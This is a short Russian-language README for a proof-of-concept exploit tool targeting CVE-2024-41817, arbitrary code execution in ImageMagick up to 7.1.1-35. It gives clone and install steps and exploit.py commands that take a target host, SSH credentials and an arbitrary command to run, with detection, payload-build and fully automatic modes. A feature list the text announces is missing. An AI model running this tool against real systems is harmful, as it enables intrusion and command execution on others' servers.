
CVE-2024-41817 POC ImageMagick <= 7.1.1-35 Выполнение произвольного кода
Proof of Concept эксплойт для ImageMagick версий <= 7.1.1-35, позволяющий выполнение произвольного кода через вредоносную делегацию XML.
Этот эксплойт использует уязвимость в ImageMagick, которая позволяет выполнять произвольный код через специально созданные библиотеки. Скрипт умеет:
git clone https://github.com/Dxsk/CVE-2024-41817-poc/
cd CVE-2024-41817-poc
pip install -r requirements.txt
python3 exploit.py -H <target> -p <port> -u <user> -P <password> -d
python3 exploit.py -c "command" -B
python3 exploit.py -c "command" -H <target> -p <port> -u <user> -P <password> -A
-c, --command: Команда для выполнения (по умолчанию: "id")-H, --host: Целевой хост-p, --port: SSH-порт (по умолчанию: 22)-u, --username: SSH-имя пользователя-P, --password: SSH-пароль-d, --detection: Автоопределение уязвимого ImageMagick-B, --build: Только сборка полезной нагрузки-A, --auto: Полностью автоматический режим-v, --verbose: Подробный выводЭтот инструмент предназначен только для образовательных целей. Используйте его только против систем, на тестирование которых у вас есть разрешение.